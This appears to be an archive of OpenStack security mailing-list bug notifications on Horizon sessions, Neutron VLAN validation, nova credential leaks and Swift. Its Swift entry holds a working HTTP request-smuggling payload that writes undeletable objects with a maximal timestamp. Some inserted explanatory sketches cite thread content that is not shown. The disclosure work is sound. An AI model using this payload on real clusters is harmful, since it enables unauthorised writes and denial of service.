User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). 
==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1842930 at bugs.launchpad.net Thu Sep 19 15:14:03 2019 From: 1842930 at bugs.launchpad.net (Akihiro Motoki) Date: Thu, 19 Sep 2019 15:14:03 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156890604348.463.17364479639664631010.malone@wampee.canonical.com> I am adding keystone to the affected projects as I failed to find a good pointer on this behavior in the keystone documentation. If there is a good point in keystone already, it would be appreciated. I will refer to it in the horizon doc. ** Also affects: keystone Importance: Undecided Status: New ** Changed in: horizon Assignee: (unassigned) => Akihiro Motoki (amotoki) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). 
==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1842930 at bugs.launchpad.net Thu Sep 19 16:21:45 2019 From: 1842930 at bugs.launchpad.net (Arthur Nikolayev) Date: Thu, 19 Sep 2019 16:21:45 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156891010554.5182.3058739384646853867.malone@chaenomeles.canonical.com> Akihiro, thank you for detailed explanation. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1842930 at bugs.launchpad.net Thu Sep 19 16:26:40 2019 From: 1842930 at bugs.launchpad.net (Matthias Runge) Date: Thu, 19 Sep 2019 16:26:40 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156891040037.425.13951429236988176056.malone@wampee.canonical.com> The same behaviour should be reproducible via command line client. This issue is inherent if you use tokens, which are valid for some time, and services only validate the token itself, but not (via keystone), if the token has become invalid. 
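To make the two Horizon options mentioned earlier in this thread concrete, here is a sketch for local_settings.py (which is plain Python). The values are illustrative only, and the service-side window is separately bounded by keystonemiddleware's token validation cache (300 seconds by default, per the _opts.py link earlier in this thread):

    # Illustrative values for Horizon's local_settings.py; not the defaults.
    SESSION_TIMEOUT = 1800   # seconds before an idle dashboard session expires
    SESSION_REFRESH = False  # when True (the current default), tokens are
                             # refreshed while the user stays active, so a
                             # short SESSION_TIMEOUT alone does not end the
                             # session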
-- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1840895 at bugs.launchpad.net Thu Sep 19 16:37:42 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 19 Sep 2019 16:37:42 -0000 Subject: [Openstack-security] [Bug 1840895] Re: segment parameter check failed when creating network References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156891106306.27303.12910831266593178843.malone@soybean.canonical.com> Reviewed: https://review.opendev.org/682558 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=f050abab45daeb91443797b6c82a31eb06885a68 Submitter: Zuul Branch: stable/rocky commit f050abab45daeb91443797b6c82a31eb06885a68 Author: Slawek Kaplonski Date: Fri Aug 30 22:32:19 2019 +0200 Fix creation of vlan network with segmentation_id set to 0 In case when vlan network was created with segmentation_id=0 and without physical_network given, it was passing validation of provider segment and first available segmentation_id was choosen for network. Problem was that in such case all available segmentation ids where allocated and no other vlan network could be created later. This patch fixes validation of segmentation_id when it is set to value 0. Change-Id: Ic768deb84d544db832367f9a4b84a92729eee620 Closes-bug: #1840895 (cherry picked from commit f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b) ** Tags added: in-stable-rocky ** Tags added: in-stable-queens -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Thu Sep 19 16:37:54 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 19 Sep 2019 16:37:54 -0000 Subject: [Openstack-security] [Bug 1840895] Fix merged to neutron (stable/queens) References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156891107439.5297.5015689445379343363.malone@chaenomeles.canonical.com> Reviewed: https://review.opendev.org/682559 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=17f3b75007643e8329eb93194d2e9597be3b90fb Submitter: Zuul Branch: stable/queens commit 17f3b75007643e8329eb93194d2e9597be3b90fb Author: Slawek Kaplonski Date: Fri Aug 30 22:32:19 2019 +0200 Fix creation of vlan network with segmentation_id set to 0 In case when vlan network was created with segmentation_id=0 and without physical_network given, it was passing validation of provider segment and first available segmentation_id was choosen for network. Problem was that in such case all available segmentation ids where allocated and no other vlan network could be created later. This patch fixes validation of segmentation_id when it is set to value 0. Change-Id: Ic768deb84d544db832367f9a4b84a92729eee620 Closes-bug: #1840895 (cherry picked from commit f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From fungi at yuggoth.org Thu Sep 19 23:08:01 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 19 Sep 2019 23:08:01 -0000 Subject: [Openstack-security] [Bug 1840507] Re: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <156893448210.27343.13963351501122096991.malone@soybean.canonical.com> Yes, it does get a little weird since the bug in question appeared in a release only on the master branch of a project which maintains stable branches as well. There would be no guarantee of a means for distributors of 2.22.0 to backport a clean fix, though I suppose that could still be possible depending on how much they care about the related unit test issue. 
Regardless, since Python 3 support in 2.22.0 was marked as experimental, that means we could similarly consider it covered by class B3 in our report taxonomy as well. As this plan has the consent of both the original reporter and the Swift PTL (being one and the same person), I won't delay further in switching it to public. Thanks, Tim! ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. 
Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): New Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. 
Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. 
As a result, the data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should be fairly trivial to craft a larger one; this has potential as a DOS attack on a cluster by filling its disks.

The fix should involve at least two things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend.

[1] https://bugs.python.org/issue37093
[2] https://github.com/openstack/swift/commit/76fde8926
[3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3
[4] https://github.com/openstack/swift/commit/f581fccf7

To manage notifications about this bug go to:
https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions

From 1840895 at bugs.launchpad.net Fri Sep 20 09:35:06 2019
From: 1840895 at bugs.launchpad.net (OpenStack Infra)
Date: Fri, 20 Sep 2019 09:35:06 -0000
Subject: [Openstack-security] [Bug 1840895] Re: segment parameter check failed when creating network
References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com>
Message-ID: <156897210615.812.14867274112697842049.malone@wampee.canonical.com>

Reviewed: https://review.opendev.org/682557
Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=7156ebfc2853ceeeeb94b7a4f9046eeb256051c1
Submitter: Zuul
Branch: stable/stein

commit 7156ebfc2853ceeeeb94b7a4f9046eeb256051c1
Author: Slawek Kaplonski
Date: Fri Aug 30 22:32:19 2019 +0200

    Fix creation of vlan network with segmentation_id set to 0

    In case when vlan network was created with segmentation_id=0 and without physical_network given, it was passing validation of provider segment and first available segmentation_id was chosen for network. Problem was that in such case all available segmentation ids were allocated and no other vlan network could be created later. This patch fixes validation of segmentation_id when it is set to value 0.

    Change-Id: Ic768deb84d544db832367f9a4b84a92729eee620
    Closes-bug: #1840895
    (cherry picked from commit f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b)

** Tags added: in-stable-stein

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1840895

Title: segment parameter check failed when creating network
Status in neutron: Fix Released
Status in OpenStack Security Advisory: Won't Fix

Bug description:
  neutron net-create test --provider:network_type vlan --provider:segmentation_id 0

  Execute commands like this and every vlan in the ml2_vlan_allocations table is set to allocated, so no vlan network can be created. The validate_provider_segment function should check whether provider:segmentation_id is 0.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions
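(Editor's note: the Bug 1840895 change above makes provider-segment validation reject segmentation_id=0 instead of letting it fall through to the "allocate any free tag" path. As a hedged illustration only -- this is not the actual Neutron code, and InvalidInput is a hypothetical stand-in for the driver's validation exception -- a minimal range check might look like this:)

    # Editorial sketch: reject out-of-range VLAN tags, including 0, during
    # provider-segment validation rather than silently allocating tags.
    MIN_VLAN_TAG = 1
    MAX_VLAN_TAG = 4094

    class InvalidInput(Exception):
        """Hypothetical stand-in for the plugin's validation error."""

    def validate_vlan_segmentation_id(segmentation_id):
        if segmentation_id is None:
            return  # no tag requested; the plugin may allocate a free one
        if not MIN_VLAN_TAG <= int(segmentation_id) <= MAX_VLAN_TAG:
            raise InvalidInput(
                "segmentation_id %r is outside the valid VLAN range %d-%d"
                % (segmentation_id, MIN_VLAN_TAG, MAX_VLAN_TAG))

    # validate_vlan_segmentation_id(0) now raises instead of exhausting the
    # ml2_vlan_allocations table.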
From morgan.fainberg at gmail.com Mon Sep 23 17:26:12 2019
From: morgan.fainberg at gmail.com (Morgan Fainberg)
Date: Mon, 23 Sep 2019 17:26:12 -0000
Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon
References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com>
Message-ID: <156925957297.13161.5652308264070002939.malone@gac.canonical.com>

Added Keystonemiddleware and documentation tags. Marked as "medium" importance as it requires documentation changes but is not critical/RC/otherwise impacting. Clear communication of expected behavior is important and should be found in Horizon's and keystonemiddleware's documentation. I am marking this invalid for Keystone itself, as keystone will invalidate its internal cache (barring cases such as the in-memory [not production quality] dict-based cache).

** Tags added: documentation ** Also affects: keystonemiddleware Importance: Undecided Status: New ** Changed in: keystone Status: New => Confirmed ** Changed in: keystonemiddleware Status: New => Triaged ** Changed in: keystone Status: Confirmed => Triaged ** Changed in: keystone Importance: Undecided => Medium ** Changed in: keystonemiddleware Importance: Undecided => Medium ** Changed in: keystone Status: Triaged => Invalid

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1842930

Title: Deleted user still can delete volumes in Horizon
Status in OpenStack Dashboard (Horizon): Confirmed
Status in OpenStack Identity (keystone): Invalid
Status in keystonemiddleware: Triaged
Status in OpenStack Security Advisory: Won't Fix

Bug description:
  ==Problem== A user session in a second browser is not terminated after that user is deleted by an admin from another browser. The user is still able to manage some objects (delete volumes, for example) in a project after being deleted by the admin.

  ==Steps to reproduce== Install OpenStack following the official docs for Stein. Log in as admin to (Horizon) in one browser. Create a user with the 'member' role and assign it to a project. Open another browser and log in as the created user. As the admin user, delete the created user from the "first" browser. Switch to the "second" browser and try to browse through different sections of the dashboard as the deleted user -> instances are not shown, but the deleted user can list images, volumes and networks. This deleted user can also delete a volume.

  ==Expected result== The user session in the current browser is closed after the user is deleted in another browser. I tried this in the Newton release and it works as expected (for a short time before the session is ended, the deleted user can't list objects in instances or volumes).

  ==Environment== OpenStack Stein
  rpm -qa | grep -i stein
  centos-release-openstack-stein-1-1.el7.centos.noarch
  cat /etc/redhat-release
  CentOS Linux release 7.6.1810 (Core)
  rpm -qa | grep -i horizon
  python2-django-horizon-15.1.0-1.el7.noarch
  rpm -qa | grep -i dashboard
  openstack-dashboard-15.1.0-1.el7.noarch
  openstack-dashboard-theme-15.1.0-1.el7.noarch

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions

From 1823104 at bugs.launchpad.net Fri Sep 27 09:04:57 2019
From: 1823104 at bugs.launchpad.net (OpenStack Infra)
Date: Fri, 27 Sep 2019 09:04:57 -0000
Subject: [Openstack-security] [Bug 1823104] Fix included in openstack/nova 20.0.0.0rc1
References: <155434268658.20433.7202128545677329084.malonedeb@chaenomeles.canonical.com>
Message-ID: <156957509759.31709.13013970358786613602.malone@soybean.canonical.com>

This issue was fixed in the openstack/nova 20.0.0.0rc1 release candidate.

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1823104 Title: CellMappingPayload in select_destinations versioned notification sends sensitive database_connection and transport_url information Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) stein series: Fix Committed Bug description: As of this change in Stein: https://review.openstack.org/#/c/508506/28/nova/notifications/objects/request_spec.py at 334 Which is not yet officially released, but is in the 19.0.0.0rc1, the select_destinations versioned notification payload during a move operation (resize, cold/live migrate, unshelve, evacuate) will send the cell database_connection URL and MQ transport_url information which contains credentials to connect directly to the cell DB and MQ, which even though notifications are meant to be internal within openstack services, seems like a pretty bad idea. IOW, just because it's internal to openstack doesn't mean nova needs to give ceilometer the keys to it's cell databases. There seems to be no justification in the change for *why* this information was needed in the notification payload, it seemed to be added simply for completeness. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1823104/+subscriptions From 1816727 at bugs.launchpad.net Fri Sep 27 09:05:25 2019 From: 1816727 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 27 Sep 2019 09:05:25 -0000 Subject: [Openstack-security] [Bug 1816727] Fix included in openstack/nova 20.0.0.0rc1 References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <156957512535.6829.9989353975740825835.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/nova 20.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. 
With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by 